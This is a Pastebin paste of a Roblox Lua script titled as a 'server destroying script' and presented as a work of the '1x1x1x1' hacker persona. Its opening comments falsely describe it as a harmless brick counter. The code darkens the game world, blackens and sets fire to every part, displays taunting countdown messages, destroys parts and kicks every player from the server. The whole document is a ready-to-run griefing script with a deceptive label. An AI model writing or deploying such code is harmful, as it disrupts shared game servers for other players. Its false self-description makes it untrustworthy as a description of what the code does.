Advertisement
anphu04

1x1x1x1 server destroying script

Jul 6th, 2017
2,133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.10 KB | None | 0 0
  1. -- Quick scan:
  2. -- This will just give you a brick-count and print it to your output
  3. -- Go in Solo or Online mode to get a dynamic GUI counter
  4.  
  5. local lighting = game:GetService("Lighting")
  6. lighting.Brightness = 0
  7. lighting.OutdoorAmbient = Color3.new(0,0,0)
  8. local sky = Instance.new("Sky", lighting)
  9. sky.SkyboxBk = "http://www.roblox.com/asset/?id=48020371"
  10. sky.SkyboxDn = "http://www.roblox.com/asset/?id=48020144"
  11. sky.SkyboxFt = "http://www.roblox.com/asset/?id=48020234"
  12. sky.SkyboxLf = "http://www.roblox.com/asset/?id=48020211"
  13. sky.SkyboxRt = "http://www.roblox.com/asset/?id=48020254"
  14. sky.SkyboxUp = "http://www.roblox.com/asset/?id=48020383"
  15.  
  16. local parts = {}
  17. function scan(p)
  18. for _,target in pairs(p:GetChildren()) do
  19. if (target:IsA("BasePart")) then
  20. table.insert(parts,target) -- target is the actual parts!
  21. target.BrickColor = BrickColor.new("Really black")
  22. local sb = Instance.new("SelectionBox", target)
  23. sb.Color3 = Color3.new(255, 0, 0)
  24. sb.SurfaceColor3 = Color3.new(170, 0, 0)
  25. sb.Adornee = target
  26. local pe = Instance.new("ParticleEmitter", target)
  27. pe.Name = "10101110010011"
  28. pe.Texture = "rbxassetid://45524735"
  29. pe.Rate = 10
  30. pe.SpreadAngle = Vector2.new(-90, 90)
  31. local pe2 = Instance.new("ParticleEmitter", target)
  32. pe2.Name = "ERROR_._ER-__ORO_...."
  33. pe2.Texture = "rbxassetid://158293315"
  34. pe2.Rate = 10
  35. pe2.SpreadAngle = Vector2.new(-90, 90)
  36. local bb = Instance.new("BillboardGui", target)
  37. bb.Size = UDim2.new(50,0 , 25,0)
  38. bb.AlwaysOnTop = true
  39. local randomtext = {
  40. "1x1x1x1 !S B4CK",
  41. "101010110100101011101111010101",
  42. "_-ERROR-_"
  43. }
  44. local label = Instance.new("TextLabel", bb)
  45. label.Size = UDim2.new(1,0 , 1,0)
  46. label.TextScaled = true
  47. label.TextWrapped = true
  48. label.BackgroundTransparency = 1
  49. local brickcolor = BrickColor.new("Really red")
  50. label.TextColor3 = brickcolor.Color
  51. label.Font = "ArialBold"
  52. label.TextSize = 100
  53. local chosentext = randomtext[math.random(1, #randomtext)]
  54. label.Text = chosentext
  55. local fire = Instance.new("Fire", target)
  56. fire.Size = 30
  57. fire.Heat = 25
  58. end
  59. scan(target)
  60. end
  61. end
  62. scan(game.Workspace)
  63. --print(#parts .. (#parts == 1 and " brick " or " bricks ") .. "counted")
  64. parts = {}
  65. wait(1)
  66.  
  67.  
  68. local m = Instance.new("Message", game.Workspace)
  69. m.Text = "1x1x1x1 HAS RETURNED TO DESTROY ROBLOX!"
  70. wait(3)
  71. m.Text = "STARTING COUNTDOWN..."
  72. wait(2)
  73. m.Text = "ONCE THE TIMER REACH 0, THIS SERVER WILL NO LONGER EXIST!"
  74. wait(5)
  75.  
  76. local unit = 10
  77. wait(1)
  78. for i = 1, 10 do
  79. unit = unit - 1
  80. m.Text = "COUNTDOWN: " ..unit.. " SECONDS LEFT!"
  81. wait(1)
  82. end
  83.  
  84. m.Text = "FAREWELL, IDIOTS! MUAHAHAHAHAHAHAHA!!!"
  85.  
  86. local prey = nil
  87. local parts = script.Parent:GetChildren()
  88.  
  89. for i = 1,#parts do
  90. if (parts[i].className == "Part") then
  91. if (prey ~= nil)then
  92. prey:Destroy()
  93. end
  94. prey = parts[i]
  95. end
  96. end
  97.  
  98. for i, players in pairs(game.Players:GetChildren()) do
  99. players:Kick("010111010101000101011101010100010111101010010100010111101011010100101010101010101010101010101001010101011011010110100101010101010101011101")
  100. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement